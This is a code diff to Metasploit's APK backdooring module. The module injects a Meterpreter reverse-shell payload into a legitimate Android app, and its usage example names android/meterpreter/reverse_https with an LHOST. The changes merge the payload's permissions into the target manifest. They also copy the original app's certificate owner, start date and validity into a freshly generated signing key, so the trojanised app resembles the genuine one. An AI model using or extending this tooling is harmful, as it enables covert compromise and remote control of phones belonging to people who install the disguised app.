@@ -7,6 +7,7 @@ require 'nokogiri'
 require 'fileutils'
 require 'optparse'
 require 'open3'
+require 'date'
 
 class Msf::Payload::Apk
 
@@ -18,6 +19,8 @@ class Msf::Payload::Apk
     $stderr.puts "[-] #{msg}"
   end
 
+  alias_method :print_bad, :print_error
+
   def usage
     print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n"
     print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
@@ -74,17 +77,23 @@ class Msf::Payload::Apk
     original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
     original_permissions = original_manifest.xpath("//manifest/uses-permission")
 
-    manifest = original_manifest.xpath('/manifest')
     old_permissions = []
-    for permission in original_permissions
+    original_permissions.each do |permission|
       name = permission.attribute("name").to_s
       old_permissions << name
     end
-    for permission in payload_permissions
+
+    application = original_manifest.xpath('//manifest/application')
+    payload_permissions.each do |permission|
       name = permission.attribute("name").to_s
       unless old_permissions.include?(name)
         print_status("Adding #{name}")
-        original_permissions.before(permission.to_xml)
+        if original_permissions.empty?
+          application.before(permission.to_xml)
+          original_permissions = original_manifest.xpath("//manifest/uses-permission")
+        else
+          original_permissions.before(permission.to_xml)
+        end
       end
     end
 
@@ -92,16 +101,37 @@ class Msf::Payload::Apk
     application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
     application << payload_manifest.at_xpath('/manifest/application/service').to_xml
 
-    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts original_manifest.to_xml }
+    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
+  end
+
+  def parse_orig_cert_data(orig_apkfile)
+    orig_cert_data = Array[]
+    keytool_output = run_cmd("keytool -J-Duser.language=en -printcert -jarfile #{orig_apkfile}")
+    owner_line = keytool_output.match(/^Owner:.+/)[0]
+    orig_cert_dname = owner_line.gsub(/^.*:/, '').strip
+    orig_cert_data.push("#{orig_cert_dname}")
+    valid_from_line = keytool_output.match(/^Valid from:.+/)[0]
+    from_date_str = valid_from_line.gsub(/^Valid from:/, '').gsub(/until:.+/, '').strip
+    to_date_str = valid_from_line.gsub(/^Valid from:.+until:/, '').strip
+    from_date = DateTime.parse("#{from_date_str}")
+    orig_cert_data.push(from_date.strftime("%Y/%m/%d %T"))
+    to_date = DateTime.parse("#{to_date_str}")
+    validity = (to_date - from_date).to_i
+    orig_cert_data.push("#{validity}")
+    return orig_cert_data
   end
 
   def backdoor_apk(apkfile, raw_payload)
-
     unless apkfile && File.readable?(apkfile)
       usage
       raise RuntimeError, "Invalid template: #{apkfile}"
     end
 
+    keytool = run_cmd("keytool")
+    unless keytool != nil
+      raise RuntimeError, "keytool not found. If it's not in your PATH, please add it."
+    end
+
     jarsigner = run_cmd("jarsigner")
     unless jarsigner != nil
       raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it."
@@ -122,20 +152,24 @@ class Msf::Payload::Apk
       raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
     end
 
-    unless File.readable?(File.expand_path("~/.android/debug.keystore"))
-      android_dir = File.expand_path("~/.android/")
-      unless File.directory?(android_dir)
-        FileUtils::mkdir_p android_dir
-      end
-      print_status "Creating android debug keystore...\n"
-      run_cmd("keytool -genkey -v -keystore ~/.android/debug.keystore \
-      -alias androiddebugkey -storepass android -keypass android -keyalg RSA \
-      -keysize 2048 -validity 10000 -dname 'CN=Android Debug,O=Android,C=US'")
-    end
-
     #Create temporary directory where work will be done
     tempdir = Dir.mktmpdir
 
+    keystore = "#{tempdir}/signing.keystore"
+    storepass = "android"
+    keypass = "android"
+    keyalias = "signing.key"
+    orig_cert_data = parse_orig_cert_data(apkfile)
+    orig_cert_dname = orig_cert_data[0]
+    orig_cert_startdate = orig_cert_data[1]
+    orig_cert_validity = orig_cert_data[2]
+
+    print_status "Creating signing key and keystore..\n"
+    run_cmd("keytool -genkey -v -keystore #{keystore} \
+    -alias #{keyalias} -storepass #{storepass} -keypass #{keypass} -keyalg RSA \
+    -keysize 2048 -startdate '#{orig_cert_startdate}' \
+    -validity #{orig_cert_validity} -dname '#{orig_cert_dname}'")
+
     File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload }
     FileUtils.cp apkfile, "#{tempdir}/original.apk"
 
@@ -203,7 +237,7 @@ class Msf::Payload::Apk
     print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
     run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
     print_status "Signing #{injected_apk}\n"
-    run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey")
+    run_cmd("jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore #{keystore} -storepass #{storepass} -keypass #{keypass} #{injected_apk} #{keyalias}")
     print_status "Aligning #{injected_apk}\n"
     run_cmd("zipalign 4 #{injected_apk} #{aligned_apk}")
 
